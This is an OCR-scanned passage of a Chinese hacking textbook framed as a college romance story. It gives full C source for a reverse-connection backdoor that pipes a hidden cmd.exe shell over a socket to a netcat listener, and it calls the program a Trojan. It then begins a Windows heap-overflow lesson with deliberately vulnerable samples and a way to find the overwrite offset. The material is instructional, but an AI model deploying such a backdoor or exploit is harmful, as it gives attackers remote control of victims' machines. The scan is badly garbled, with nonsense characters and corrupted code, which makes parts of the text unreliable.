老病 说 ,“ 好 累 啊 ， 本 来 还 要 讲 反 连 后 门 的 编写 的 ， 看 来 时 间 来 不 及 了 。 大 家 下 去 讨论 一 下 如 
何 实现 吧 ! ” 


“ 反 连 后 门 ?是 什么 ?" 玉 波 问 道 。 


“刚才 的 程序 是 目标 机 作为 服务 端 ， 监 听 830 端 口 ; 攻击 机 作为 客户 端 ， 正 向 连接 目标 机 的 830 
新 口 ， 其 示意 图 如 图 3 一 35。” 


攻击 机 
Client 





“但 如 果 目 标 机 开启 了 防火 墙 ， 这 种 方法 融 不 行 了 。 目 标 机 的 防火 墙 会 阻 断 对 非法 痕 口 的 连 
接 ， 如 图 3 一 36。” 


npe 


攻击 机 
Client 








“ 哦 ， 那 怎么 办 呢 ?， 


“所 以 我 们 要 使 用 反 向 连接 。" 老 师 说 道 。“ 其 示意 图 如 图 3 一 37。” 


防火 墙 


目标 机 
Client 








“ 反 向 连接 是 把 攻击 机 作为 服务 端 ， 监 听 一 个 端口 ; 而 目标 机 上 运行 的 ShellCode 的 功能 是 主 
动 连接 攻击 机 监听 的 闯 口 。 一 般 的 防火 墙 (特别 是 硬件 防火 墙 ) 不 会 阻 断 内 往外 的 连接 ， 所 
以 很 多 情况 下 是 可 以 成 功 的 。” 

“I | , 

“而 软件 防火 墙 ， 有 的 可 能 会 弹出 一 个 对 话 框 ， 询 问 是 否 人 允许 往外 连接 ， 如 果 用 户 点 击 了 不 人 多 
许 ， 那 也 不 能 成 功 。” 

“还 是 不 能 完全 成 功 啊 ? "ACA НОЈЕ, 

“要 突破 那样 的 防火 墙 ， 需 要 用 到 更 高 级 的 ShellCode 编 程 ， 我 们 以 后 再 说 。 这 里 布置 一 个 课 
后 作业 ， 实 现 并 提取 一 个 简单 反 连 后 门 的 ShellCode， 大 家 还 是 以 刚才 的 分 组 进行 操作 。” 
“ШШ ^? 编写 思路 都 还 没有 了 呢 。” 


“ 那 我 提示 一 下 ， 这 个 ShellCode 的 功能 是 作为 客户 疹 ， 主 动 连 授 我 们 攻击 机 的 一 个 靖 口 。 剩 
下 的 传输 命 分 、 执 行 命 分 ， 返 回 结果 和 前 面 类 似 。 攻 击 机 上 开端 口 不 用 编程 ， 用 程序 NC 来 
ж 

“NC 是 什么 ?" 玉 波 问 道 。 

“NC 是 什么 ， 大 家 去 网 上 查 查 吧 ! 这 样 可 以 锻炼 你 们 解决 问题 的 能 力 。 明 白 了 吗 ?” 

“大 家 把 讨论 结果 用 E-mail 发 给 我 ， 这 将 作为 一 次 平时 作业 的 成 绩 。 今 天 到 此 结束 1 下课 1! 


ByeBye ! ” 


3.6 反 连 后 门 ShellCode 的 编写 


宇 强 回来 后 ， 找 出 记录 小 倩 电 话 的 纸 ， 犹 豫 了 半天 ， 终 于 误 起 勇气 氢 出 了 号 码 。 电 话 响 了 两 


声 后 ， 一 个 声音 传 来 SERRE?” 

E M FRIT F, AEEA 2” 

“ТЕ, MES... 

哦 ， 原 来 是 她 同学 啊 ! 

过 了 一 会 ， 小 倩 的 声音 从 电话 里 传 来 。 " 喂 ! ЩЩ?” 
“是 我 ， 今 天 和 你 一 组 讨论 的 宇 强 。 

“ 哦 ， 是 你 啊 ， 有 什么 事 吗 ? "小 倩 问 道 。 


宇 强 连忙 解释 : “老病 不 是 布置 作业 了 吗 ? 你 什么 时 候 有 空 ， 我 们 一 起 讨论 一 


平时 的 作业 区 上 去 。 

“好 啊 | "小 倩 笑 了 ,，“ 周 末 我 要 回 家 ， 那 三 十 号 上 午 吧 ! 我 没 课 。” 
“| 我， 就 是 明天 呀 ! 好 啊 ， 我 也 没 课 ， 那 明天 10 点 钟 我 来 找 你 吧 ! ^ 
“好 吧 ， 再 见 

宇 强 放 下 电话 非常 高 兴 ， 忙 着 准备 思路 和 实际 测试 。 


下 吧 ! 然后 作为 


3.6.1 总 体 思 路 和 实现 

第 二 天 宇 强 按时 找 通 了 小 倩 寝室 的 电话 ， 这 次 是 小 倩 自己 接 的 。 
“你 好 啊 ! 我 是 宇 强 。 我 现在 你 们 寝室 下 面 。” 

“好 ， 你 等 一 会 儿 ， 我 马上 下 来 。” 


过 了 几 分钟 ， 小 倩 穿 了 件 淡 蓝 色 的 外 套 ， 青 看 日 色 书 包 出 现在 了 门口 。 衬 强 蜡 目 惊叹 ,，“ 好 漂 
sol 1” 


宇 强 和 与 小 倩 一 行走 在 去 三 教 的 路 上 。 在 路 上 他 们 边 走边 聊 。 


在 去 第 三 教学 楼 的 路 上 ， 要 经 过 一 个 复 球 场 。 宇 强 往 里 面 望 了 望 ， 好 多 人 呀 ， 有 打 复 球 的 、 
有 练习 排球 的 、 也 有 打 羽 毛 球 的 ...... 他 们 沐浴 在 温暖 的 阳光 中 。 


在 教学 楼 门 表 ， 衬 强 看 见 了 一 对 老人 相互 鬼 扶 看 散步 ， 头 发 早已 花 日 。 虽然 步履 咒 踊 ， 但 他 


宇 强 也 不 禁 心里 一 动 , “和 我 执 子 之 手 ， 与 之 借 老 的 人 又 在 哪儿 呢 ? 

到 三 教 后 发 现 上 自习 的 人 很 少 ， 教 室 里 只 有 三 两 个 人 。 

小 倩 看 了 几 个 教室 ， 小 声 说 道 : “怎么 办 ?教室 里 都 有 人 ， 说 话 打 扰 别 人 也 不 好 啊 ! ” 

宇 强 眼 睛 一 转 ， 说 :“ 去 教师 休息 室 吧 ! 课 间 同 学 们 都 在 那儿 问 老病 问题 ， 我 们 可 以 去 那里 讨 


ib. ” 

“好 主意 1 "ЛМЕ АВ) C8. 

教室 休息 室 里 摆 放 着 桌 几 、 椅 子 ， 还 有 开水 ， 以 供 老病 在 课 间 休息 时 饮用 。 条 件 还 不 错 ! 
两 人 坐 下 后 ， 衬 强 说 道 : “其 实 老病 已 经 提示 很 多 了 ， 我 们 理 一 下 思路 ， 融 可 以 把 它 实现 。” 


“TE? MIAGE. "小 倩 说 ， “我 查 了 一 下 老 症 说 的 NC。 任 何 计 算 机 都 可 以 用 NC 下 接 监 听 端 
口 ， 用 法 是 nc 一 | 一 p port 。 如 果 有 别 的 计算 机 连 援 这 个 痛 口 ， 也 可 以 得 到 一 个 Shell。” 


小 知识 : 880 X 7J——NC 
常用 的 用 法 : 输入 -h 可 以 得 到 帮助 信息 
-e prog 程序 重 定 同 ， 一 旦 连接 ， 融 执行 
-i secs ЖЕ B^] ja] ËB 

-| 监听 模式 ， 用 于 入 站 连接 


-n 指定 数字 的 IP 地 址 ， 不 能 用 hostname 

-0 file 记录 16 进 制 的 传输 

-p port 本 地 端口 号 

-r 任意 指定 本 地 及 远程 亲口 

-s addr 本 地 源 地 址 

-u UDP 模 式 

-v 详细 输出 一 一 用 两 个 -Vv 可 得 到 更 详细 的 内 容 
-W Wait 超 时 的 时 间 

-Z 将 输入 输出 关 掉 一 一 用 于 扫 搓 时 


“对 1” 宇 强 说 道 ， sj nc -| -p 830 监听 830 疹 口 ， 而 在 目标 机 上 运行 
ShellCode， 其 功能 是 主动 连接 我 们 攻击 机 的 IP 和 830 端 口 来 接收 命令 。 这 就 是 反 连 的 意思 。” 
“ 虽 ， 思 路 应 该 束 是 这 样 1 "小 倩 说 道 。 

“网 络 传输 部 分 和 正 向 类 似 ， 只 不 过 ShellCode 是 客户 端 ， 流 程 应 该 是 :” 


socket()—connet(1% 3; #lip, 9mL1)—send/recv()closesocket() 


“实现 也 比较 简单 ， 像 下 面 这 样 。” FBA DLE. 


WSAStartup(MAKEWORD(2, 2), 8&ws ); 
WSASocket(PF INET, SOCK STREAM, IPPROTO TCP, NULL, 0, 0); 
connect(s,(struct sockaddr *)&server,sizeof(server) ); 


“和 CMD 子 进程 连接 也 是 一 样 的 ， 或 者 用 一 个 管道 ， чаш ， 或 者 不 用 管道 ， 直 接 用 
Socket 句 柄 来 代替 。” 宇 强 继续 说 ，“ 就 像 下 面 这 样 


//CMD 的 输入 输出 句柄 ， 都 用 Socket 来 替换 

si.hstdInput = si.hStdOutput = si.hStdError = (void *)s; 

// 建 立 进 程 
ret-CreateProcess(NULL, стаі 1 пе, NULL, NULL, 1, O, NULL, NULL, &si,&ProcessInformation); 


“把 它们 合 起 来 就 可 以 了 吧 ? "小 倩 说 。 
“是 啊 ， 我 们 可 以 得 到 反 向 连接 的 程序 (BackC.cpp) ， 如 下 :” 


#include <winsock2.h> 
#include <stdio.h> 

#pragma comment(lib,"Ws2 32") 
int main() 


WSADATA ws; 

SOCKET s; 

int ret; 

// 初 始 化 wsa 

WSAStartup(MAKEWORD(2, 2), &ws); 

//$&XrSocket 

s-WSASocket(PF INET, SOCK STREAM, IPPROTO TCP, NULL, 0, 0); 

/ / i£ $9175 830m A 

struct sockaddr in server; 

server.sin family - AF INET; 

server.sin port - htons(830); 

server.sin addr.s addr-inet addr("127.0.0.1"); 

// 反 向 连接 | 

connect(s,(struct sockaddr *)&server,sizeof(server) ); 

STARTUPINFO si; 

ZeroMemory(&si,sizeof(si)); 

si.cb - sizeof(si); 

si.dwFlags = STARTF USESHOWWINDOW|STARTF USESTDHANDLES; 

si.wShowwindow - SW HIDE; 

/VCMD 的 输入 输出 句柄 ， 都 用 Socket 来 蔡 换 

si.hstdInput = si.hStdOutput = si.hStdError = (void *)s; 

char cmdLine[] = "cmd.exe"; 

PROCESS_INFORMATION ProcessInformation; 

// 建 立 进程 
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,@0,NULL,NULL,&si,&ProcessInformation); 
return 0; 


“ЕЕ, ÍRoOBB ERES" 
Fal AEE, J AB SEES BEER. 


“Hf, ПЕЕ ВЕ, 05637 пс -l -p 830 来 监听 ， 然 后 运行 程序 backC.cpp。 如 果 一 切 正 
单 ， 丈 点 该 如 图 3 一 38 所 示 ，NC 得 到 了 一 个 shell。” 宇 强 说 。 
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Ln 34, Col 1 





“ 剩 下 就 是 转换 成 汇编 和 ShellCode 了 。 
“这 个 可 是 苦力 活 啊 .…….…" 小 倩 吐 了 吐 舌 头 。 
“ 那 这 样 吧 ， 我 周末 回 家 的 时 候 生 成 BackAsm.cpp 和 BackShellCode.cpp 发 给 老病 ， 也 帮 你 发 


= 

“好 啊 ! ARRIR Т» "小 倩 说 。 

那里， 客气 了 。 "suni ХА Т 
这 个 也 应 该 算是 个 木马 吧 ? "小 倩 问 道 。 
“是 啊 ， 一 个 简单 的 特 洛 依 木 马 。” 


“Hk ! 特 洛 依 木 马 ? MEET ERR BRE 1 "小 倩 说 ,“ 听 说 很 好 看 的 ， 程 序 这 件 事 挺 
膝 烦 你 的 ， 我 请 你 看 电影 吧 1" 


“ 啊 ? 那 怎么 行 上 1 ” 宇 强 赶紧 推辞 。 
“哎哟 | 别 争 来 争 去 了 ， 那 我 们 融 AA 吧 ! ” 


“ 4 » 
m, fr! 


3.6.2 从 伸 话 到 史诗 


《 特 洛 依 》 的 场 影 招 得 很 有 气势 ! 





《 特 洛 依 》 


电影 放映 到 中 场 时 ， 宇 强 说 : “刚才 电影 里 的 那个 ' 特 洛 依 ' 看 来 属于 反 连 后 门 哦 1 
“呵呵 ，" 小 倩 被 逗乐 了 ，* 是 刚才 我 们 窟 的 那 种 吗 ?， 


守 强 挠 了 挠 头 ， 说 追 :“ 不 过 好 像 也 是 正 连 后 门 ， 主 动 开 的 城 门 一 一 端口 ， 让 希腊 人 (攻击 
Wm) 连接 。” 


“哈哈 ! "小 倩 更 乐 了 。 


电影 完 比 


9/50, FRAMAR, Ei% Fit, FRH : “我 把 手机 号 给 你 吧 ， 有 什么 事情 好 联 


“好 的 ， 我 记 下 了 ， 不 过 我 现在 还 没有 手机 ， 可 能 会 回 家 买 1” 
“好 的 ， 周 末 愉 快 RAI 


谢谢， 你 也 是 ，byebye ! ” 


Ж 6 А = 


О: 为 什么 要 推广 lpv6 呢 ?lpv4 有 什么 缺点 吗 ? 


A: lpv4 最 大 的 缺点 束 是 能 分 配 的 IP 资 源 不 足 。 除 此 之 外 ，1lpv4 还 存在 一 些 安全 上 的 缺陷 ， 上 比 
如 不 鉴别 源 痕 的 合法 性 等 。 

О: 讲 了 三 种 监听 闯 口 后 面 的 实现 方法 ， 分 别 是 双 管 道 、 单 管道 和 雾 管道 ， 究 竞 哪 种 方法 最 好 
呢 ? 

A: 兵 无 定 势 ， 水 无 常 行 。 不 存在 最 好 的 方法 ， 只 有 最 适合 实际 情况 的 方法 。 我 认为 最 好 的 方 


法 对 你 来 说 未 必 方 便 ， 很 多 事情 都 是 这 样 的 。 不 过 ， 非 要 给 答案 的 话 ， 建 议 大 家 尽量 考虑 使 
用 管道 吧 ! 因为 Winsock 建 议 使 用 像 Socket 的 重 接 套 接 字 。 


О: 测试 单 管道 后 门 程序 时 ， 我 用 Telnet 登 陆 成 功 ， 但 不 能 执 比如 敲 入 dir 命令， 结 
果 显 示 “d 不 是 程序 或 命 售 ，i 不 是 程序 或 命令，r 不 是 程序 或 命令 "， 真 奇怪 | 


A : 呵呵 1 因为 Telnet 的 设计 目的 是 最 大 限度 的 减少 时 延 。 所 以 它 遵循 的 是 用 户 刚 输 入 字符 区 
马上 传送 过 去 。 这 样 你 的 dir 命令 就 被 分 为 d、i、[r 分 别 发 送 了 。 而 单 管道 那 面 的 实现 ， 是 一 收 
到 字符 融 执 行 ， 当 然 不 能 执行 成 功 了 。 


О: 如 果 我 要 坚持 用 单 管 道 后 门 ， 该 怎么 办 ? 


А: 一 种 方法 是 改进 你 的 ShellCcode， 不 要 刚 收 到 命令 融 传 给 CMD 子 进程 执行 ， 而 是 先 把 命 分 
存 起 来 ， 收 到 回 车 后 ， 才 一 起 传 给 CMD 子 进程 ; 


А5 Т^ Теіпеї, п МС, МС& Р Л.т, а аЛ = 
后 才 一 起 发 送 过 去 。 当 然 ， 你 也 可 以 目 己 写 一 个 登陆 程序 。 


Q: 有 些 后 门 程序 执行 也 成 功 ， 登 陆 也 成 功 。 但 想 退出 时 ， 输 入 exit ám УБЕ Я 
里 ， 无 论 襄 什么 都 退 不 出 来 ， 怎 么 回 事 ? 


A: 不 是 CMD 子 进程 退 不 出 来 ， 而 是 CMD 子 进程 执行 exit 后 都 已 经 退出 了 。 你 无 论 册 输入 什 
么 ， 子 进程 都 不 会 有 输出 。 但 没有 退出 那个 接收 消息 的 循环 ， 所 以 ShellCode 融 一直 收 命令 ， 
但 什么 也 做 不 了 。 


解决 方法 : 可 以 加 个 字符 判断 。 如 果 接 收 的 命令 是 exit ， 就 退出 ShellCode 的 循环 。 


Q: 我 按照 书 上 的 步骤 测试 ， 提 取出 ShellCode， 并 在 浴 出 程序 中 测试 ， 但 不 能 成 功 ， 为 什么 
呢 ?我 的 环境 是 XP SP2。 


A : 不 能 成 功 的 原因 有 很 多 ， 本 书后 面 会 有 详细 的 分 析 。 但 XP SP2 加 入 了 新 的 安全 保护 指 
施 ， 你 先 换 个 系统 测试 吧 ! 


О: 先 写 汇编 ， 然 后 提取 ShellCode， 感 觉 有 点 麻烦 也 ...... 


A: 一 般 的 ShellCode 功 能 比较 少 ， 代 码 也 比较 短 ， 所 以 用 汇编 写 ， 在 熟 之 后 ， 还 是 比较 方便 
Hy. $6255] — ГЕУ. 


Q : 那 对 功能 要 求 比 较 多 的 ShellCode， 应 如 何方 便 的 写 呢 ? 


A :也 有 简单 的 方法 | 我 们 可 以 用 高 级 语言 写 代 码 ， 再 直接 提取 成 ShellCode。 但 要 经 过 一 定 
人 处理， 使 其 符合 流程 。 我 们 将 在 高 级 ShellCode 编 写 技 巧 中 提 到 。 


вв Windows FHER 9 25 f 


周末 很 快 就 过 去 了 ， 宇 强 正 准 备 去 上 课 ， 突 然 收 到 了 条 手机 短信 。 宇 强 打 开 一 看 ， 哇 1 居然 是 


小 倩 。 
“我 天 手机 了 ， 这 是 我 的 手机 号 一 一 吴 小 傅 。” 


她 回 家 采 然 买 了 个 手机 。 宇 强 想 了 想 ， 赶 忙 回复 短信 信 ,“ 现 在 去 上 课 吗 ?我 们 一 起 去 吧 ! 在 
RFE?” 

发 完 后 ， 衬 强 怀 在 不 安 的 心情 等 待 看 ， 并 对 目 己 的 唐 突 行为 有 点 上 自 责 ! 

过 了 一 会 ， 小 倩 回 短信 了 , “好 吧 ! 一 会 见 

宇 强 不 安 的 心 终于 平稳 了 下 来 ， 好 高 兴 啊 ! 


— 去 教室 的 路 上 ， 宇 强 一 站 给 小 倩 讨论 看 喜欢 的 足球 ， 世 界 杯 上 马 拉 多 纳 的 长 途 
齐 达 内 的 两 次 抢 点 。 


让 平 强 吃惊 的 时 ， 小 倩 居然 除了 贝克 汉 姆 外 ， 还 知道 劳 尔 。 


4.1 ањ 


走 进 教 宇 时 ， 老 病 已 经 到 了 。 两 人 急忙 找 空位 置 坐 下 。 
“这 周末 大 家 过 得 还 不 错 吧 ? "老病 问 道 。 
“好 | Жэ 声 回 答 。 


“大 家 发 过 来 的 作业 ( 反 连 后 门 的 ShellCode) 我 都 看 过 了 ， 做 的 都 很 认真 。 学 习 融 是 要 有 这 
样 的 精 利 ! "老病 满意 的 说 道 。 


“你 帮 有 我 发 给 老 证 了 吗 ? ?小 倩 小 声 的 问 旁 边 的 宇 强 。 
w, ЛЕЕ "Е 


老病 在 人 台 上 继续 说 道 : “现在 大 家 用 的 提取 ShellCode 的 方法 ， 都 是 先 写 出 汇编 ， 然 后 再 一 句 
句 的 对 应 着 抄 下 来 。 虽 然 奈 烦 ， 但 可 使 大 家 多 次 熟悉 程序 的 流程 ， 对 大 家 掌握 基础 是 大 有 好 
处 的 。” 


Фуа КУА: “当然 ， 也 有 些 轻 松 提 取 ShellCode 的 方法 ， 等 大 家 知识 进一步 巩固 后 ， 我 
再 教 给 大 家 |!” 


“ 哦 ， 那 今天 讲 什么 呢 ? EARE E, 


“Windows 下 的 浴 出 有 很 多 种 ， 比 如 格式 化 浴 出 、 整 数 洽 出 、 扒 栈 浴 出 和 挫 洽 出 等 。 而 现实 中 
最 币 利 用 的 是 堆栈 浴 出 和 扒 浴 出。 所 以 学 习 缓冲 区 浴 出 ， 除 了 堆栈 浴 出 外 ， 还 得 学 习 挫 瀹 
出 1” 


“ 哦 ! 那 今天 是 学 习 堆 浴 出 ?” 
“是 的 。 
“ 推 ?是 什么 呀 ?感觉 《数据 结构 》 里 面 也 有 堆 这 种 概念 。" 宇 强 联 想到 了 另 一 门 课 。 


不 错 上 但 这 里 的 堆 不 是 《数据 结构 》 里 说 的 堆 ; 《数据 结构 》 里 的 堆 是 种 抽象 结构 ， 要 求 父 
结 点 比 子 结 点 的 值 都 大 (或 小 ) ; 而 这 里 我 们 说 的 堆 ， 是 Windows 系 统 中 的 一 种 物理 结构 
用 来 动态 分 配 和 释放 对 象 ， 用 在 事先 不 知道 程序 所 需 对 象 的 数量 和 大 小 的 情况 下 ， 或 对 象 太 
大 而 不 适合 堆栈 分 配 程 序 的 时 候 。 英 文 就 是 heap。” 老 病 说 。 


“堆栈 浴 出 和 扒 浴 出 ， 只 相 天 一 个 字 ， 但 内 容 却 完全 不 同 。 "老病 说 着 ,“ 扒 栈 ， 在 可 执行 程序 
的 text 区 ， 是 从 遍地 址 癌 低 地 址 扩展 ， 是 存放 局 部 变量 的 地 方 ， 在 编译 时 由 编译 器 静态 分 
BD. " 


"mE, ÆA hT Aheapk, MSti a НЕ R, ЕЛА Н таос= 4 2 # 43 Bo 
数据 的 地 方 。 其 结构 关系 在 内 存 中 的 映射 如 图 4 一 1。 当 然 ， 还 有 其 他 的 data 区 等 。” 


内 存 低 址 Pj ff. Hk 


堆 增长 方向 人 € p 增长 方向 





“堆栈 浴 出 ， 我 们 已 经 详细 分 析 利 用 过 了 。 而 堆 浴 出 ， 融 是 给 分 配 的 堆 乒 字符 串 时 超过 了 所 分 
配 的 大 小 ， 从 而 和 霹 成 的 浴 出 。 我 们 也 可 利用 扒 的 浴 出 来 实现 我 们 想 要 的 功能 。” 


“在 Windows 下 ， 用 户 要求 分 配 堆 时 ， 可 以 通过 一 系列 本 数 来 完成 。 可 以 使 用 Win32 的 堆 调 用 
API 男 数 ， 或 者 C/C++ 运行 期 库 的 画 数 等 。” 


小 知识 : ЖЕЕ КАЈЛ, АРІ 
HeapAlloc 在 堆 中 申请 内 存 空间 
HeapCreate 创建 一 个 新 的 堆 对 象 
HeapDestroy 销毁 一 个 堆 对 象 

HeapFree 释放 申请 的 内 存 

HeapWalk 枚 举 堆 对 象 的 所 有 内 存 块 
GetProcessHeap 取得 进程 的 默认 堆 对 象 
GetProcessHeaps 取得 进程 所 有 的 堆 对 象 


“以 上 都 是 用 户 态 的 函数 ， 最 终 都 要 调用 ntdll 里 面 的 Rt 相关 核心 函数 。 上 比如 ， 堆 分 配 画 数 的 关 
条 如 图 4 一 2。 所 以 ， 我 们 只 用 考虑 RtlAllocateHeap 的 就 行 了 。” 


р RtAllocateHeap( ) 





Kernel32.DLL | NTDLL.DLL 


“最 好 的 学 习 方 法 是 类 比 或 对 比 。 如 果 之 前 对 新 知识 的 相关 背景 有 所 了 解 ， 那 学 习 起 来 会 很 快 
上 手 ， 而 且 很 多 思想 和 方法 都 可 借鉴 以 前 的 未 西 。" 老 病 问 道 , “大 家 觉得 该 和 什么 知识 对 比 
ye?" 


КА Bs tdeo Ў ! "БНА ВУ, “FEAH Л ABE ! ” 


Qf AER PC ӘД} 


4.2 RtlIAllcoateHeap 的 失误 

呵呵， 对 ! "老病 说 道 , “我 们 和 Windows 下 的 堆栈 浴 出 相对 比 。 我 们 先 复 习 一 下 扒 栈 浴 出 利 
用 的 三 大 步骤 。， 

1. 返 回 点 的 定位 。 利 用 报错 精确 定位 浴 出 返回 点 。 


2.ShellCcode 的 编写 。 我 们 可 以 目 己 守 ， 也 可 以 拿 现成 的 用 ; 比较 科学 的 方法 是 舟 微 修改 一 下 
外 面 的 代码 ， 完 成 我 们 想 要 的 功能 。 


3. 跳 转 到 ShellCode。 把 责 数 返回 点 覆盖 成 JMP ESP 的 地 址 ， 或 者 把 异常 处 理 点 覆盖 成 CALL 
EBX 或 者 pop pop ret 的 地 址 。 


“其 示意 图 如 图 4 一 3， 也 可 以 是 图 4 一 4 的 样子 。” 








异常 处 理 点 : 
JMP 04 Call EBX 的 地 址 
“这 三 点 大 家 都 还 记得 吧 ? "老病 问 。 
m, MIA 
"Hf, kil Ki = ане, ЗА) ВЈ RUE!" 
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4.2.1 有 问题 的 例子 
“我 们 看 一 个 简单 的 有 堆 浴 出 问题 的 程序 heapvul1.c 〈 光 盘 有 收录 ) o” 


#include <windows.h> 

#include <stdio.h> 

#include <stdlib.h> 

char mybuf[] = "ww0830"; 

int main (int argc, char *argv[]) 


HANDLE hHeap; 

char *bufi, *buf2; 

// 我 们 自己 建立 一 个 HEAP 

hHeap = HeapCreate(HEAP GENERATE EXCEPTIONS, 0x10000, Oxfffff); 
printf("mybuf addr = ?epNn",mybuf); 
// 动 态 分 配 buf1 
buf1 = HeapAlloc(hHeap, ©, 200); 
strcpy(buf1,mybuf); 

printf("bufi = 9e6sNn",buf1); 

// 动 态 分 配 buf2 

buf2 = HeapAlloc(hHeap, 0, 16); 
HeapFree(hHeap, 0, buf1); 
HeapFree(hHeap, ©, buf2); 

return 0; 


“我 给 大 家 大 致 解释 一 下 : ” 


“hHeap = HeapCreate(HEAP GENERATE EXCEPTIONS, 0x10000, 0xfffff);" 是 建立 一 个 
堆 ， 以 免 破坏 进程 默认 HEAP ; 


" риғ1 = HeapAlloc(hHeap, 0, 200); "是 动态 分 配 200 字 节 的 buf1 ; 
" strcpy(buf1,mybuf); "是 把 mybuf 数 组 的 内 容 拷 贝 给 buf1 ; 
" buf2 = HeapAlloc(hHeap, 0, 16); ”表示 接 看 分 配 buf2 ; 


" HeapFree(hHeap, 0, bufi); HeapFree(hHeap, 0, buf2); "表示 最 后 把 buf1 和 buf2 和 释放 挥 后 就 退 


=u 


“我 们 执行 一 下 试 斌 ， 使 用 VC 的 RELEASE 方 式 编 译 ， 并 在 命令 行 下 运行 ， 程 序 就 会 打印 出 
mybuf 地 址 和 buf1 内 容 ， 然 后 退出 。” 


小 知识 : 


在 VC 下 可 以 生成 DEBUG 版 本 和 RELEASE 版 本 程序 。DEBUG 有 版 被 称 为 调试 版 ，RELEASE 版 
被 称 为 发 布 版 。DEBUG 有 版 程序 中 ， 会 有 一 些 用 于 调试 的 信息 ， 所 以 会 比 RELEASE 版 程序 大 
很 多 ; 而 且 有 一 些 内 部 处 理 和 分 配 过 程 ， 比 如 堆 的 分 配 ， 两 者 也 不 同 。 


“DEBUG 有 版 的 程序 和 与 实际 运行 程序 的 内 存 结构 是 不 同 的 ， 所 以 刚才 那个 程序 要 用 VC 按照 
RELEASE 方 式 编译 ， 并 在 命 爷 行 下 运行 它 ， 不 要 在 MSDEV 中 调试 运行 。” 


“在 VC 下 生成 RELEASE 版 的 方法 是 : 选择 菜单 栏 .编译 ПЁ ЈЕО", ЕЕ ВУЗА 
动工 程 配 置 ' 中 选择 "Win32 RELEASE’， 这 样 ， 生 成 的 程序 就 会 在 Release 目 录 下 ， 并 且 是 发 


布 版 本 。” 
“也 可 以 在 工具 栏 的 ‘Select Active Configurature’ 框 中 直接 选择 生成 Release 有 版 ， 如 图 4 一 5。” 


[vulByww М Win32 Release 


- Wina? Release 











“在 mybuf 数 组 很 小 的 时 候 ， 程 序 没 有 任何 问题 ， 我 们 稍微 改变 下 程序 ， 只 是 加 长 mybuf 的 长 
度 ， 变 为 240 个 A， 上 有 具体 代码 参看 heapvul2.c (光盘 有 收录 ) 。” 


“我 们 重新 生成 RELEASE 版 的 程序 ， 在 命令 行 下 运行 它 。 效 果 如 图 4 一 6。” 








HEAPYUL2.EXE - В АЕБ х| 
"Ox77fcc39e" 指令 引用 的 "0x41414141" РІ. SAAE "written", 
ü ЗРЗЕ, ТАБЕ". 
要 调试 程序 ， 请 单 击 " 职 消 ”。 





“ 哦 1 出现 报错 对 话 杠 了 1 "大 家 说 道 ! 

“内 容 为 "0x77fcb3f5" 指 令 引 用 的 "0x41414141" 内 存 。 该 内 存 不 能 为 "written" 。'0x41' 就 是 大 
写字 母 A 的 16 进 制 码 。” 

“不 过 这 里 报 的 是 "written x 1 莫非 和 Foxmail 一 样 ， 上 履 兰 的 字符 串 太 长 了 ? "古风 疑惑 的 问 
道 。 

“不 ， 挫 浴 出 要 的 融 是 这样 的 效果 。” 老 评说 道 , “我 们 下 面 借鉴 一 下 堆栈 浴 出 编程 的 三 个 步 


gel" 


4.2.2 堆 浴 出 点 的 定位 


“第 一 步 、 浴 出 点 的 定位 。 因 为 这 里 会 出 现 报 错 对 话 框 ， —M— o, ЕН 
яш, 507856, jS КАНША, Л — 


“ЕЕ GEHE, fEmybufZX2RiH75BJ73;AUX — F, u ВЕ 2 heapvul3.c (36 & ЭЙ 
录 ) 。 我 们 把 mybuf 数 组 的 填充 方法 替换 为 : ' 


for(i=0; i<240; i++) 


mybuf[i] = 100 + i % 10; 


“重新 生成 程序 并 在 命令 行 下 执行 ， 这 次 报错 框 成 了 "0x77fcb3f5" 指 令 引 用 的 "0x69686766" 内 
容 ， 该 内 存 不 能 为 "written" ， 如 图 4 一 7。 





HEAPY¥UL3.EXE - 应 用 程序 尾 误 | | E xl 
à "Ox77fcc39e" 指令 引用 的 "0x69686766" 内 存 。 该 内存 不 能 涛 "written"。 


要 终止 程序 ,请 单 击 "确定 "。 
要 调试 程序 ， 请 单 击 " 取 消 "。 








“我 们 记 下 这 个 数字 ， 看 来 是 "0x69686766' 履 盖 到 了 浴 出 点 。 mybuf[i] = 100 + i % 10 
的 取 余 数 改 为 整除 ， 得 到 程序 heapvul4.c (光盘 有 收录 ) 。 


for(i=0; i<240; i++) 


mybuf[i] = 100 + i / 10; 


“执行 heapvul4， 这 次 出 现 的 人 "0x77fcb3f5" 指 邻 引用 的 "0x79797979" 内 容 ， 该 内 存 
不 能 为 "written" ， 如 图 4 一 8。 


HEAPYUL4.EXE - KARFA | Е x 
"Ox77fcc39e" 指令 引用 的 "0x79797979" 内 存 。 访 内存 和 不 能 洲 "written'"。 


x 要 终止 程序 ， 请 单 击 "确定 "。 
和 要 调试 程序 ， 请 单 击 " 职 消 *。 











“我 们 分 析 一 下 这 两 个 过 程 。 第 一 次 是 把 mybuf 数 组 不 停 的 加 上 100 一 109， 即 十 六 进 制 0x64 一 
0x6D 的 循环 ; 第 二 次 则 是 以 10 为 一 段 长 度 ， 每 段 分 别 以 0x64、0x65...... 来 填充 mybuf。” 


“第 一 次 澄 出 时 ， 报 错 值 是 0x66， 此 时 数组 中 只 有 0x64~0x6D 不 断 循环 ， 所 以 我 们 可 以 推出 
尾数 是 0x66 一 0x64 2, ” 


“第 二 次 渝 出 时 ， 报 错 的 全 部 是 0x79， 而 此 时 是 从 0x64 开 始 ， 每 10 个 数 为 一 段 。0x79 一 0x64 
—0x15 (十 进 制 的 21) ， 即 在 字符 串 的 第 21 个 段 。” 


“我 们 可 以 计算 出 出 错 点 的 位 置 了 ， 如 下 :” 


(0x79—0x64) x10+ (0x66—0x64) =21х10+2=212 


“大 家 验证 一 下 ， 指 定 mybuf 第 212 开 始 的 四 个 字 节 是 'BBBB'， 其 余 全 部 为 A。 如 果 我 们 的 计算 
正确 ， 那 么 应 该 是 0x42 (B 的 十 六 进 制 ) 履 兰 到 浴 出 点 。” 


for(i=0; i<240; 1++) 


mybuf[i] = 'А'; 


mybuf[212] = 'B'; 
mybuf[213] = 'B'; 
mybuf[214] = 'B'; 
mybuf[215] = 'B'; 


“好 ， 这 样 修改 后 ， 执 行 该 程序 (heapvul5.c， 光 盘 有 收录 ) ， 大 家 看 1” 
HEAPVULS.EXE - 应 用 程序 鲁 误 Е X] 
"Ox77fcc39e" 指令 引用 的 "0x42424242" 内 存 。 访 内 存 趟 能 为 "written". 


要 终止 程序 ， 请 单 击 "确定 "。 
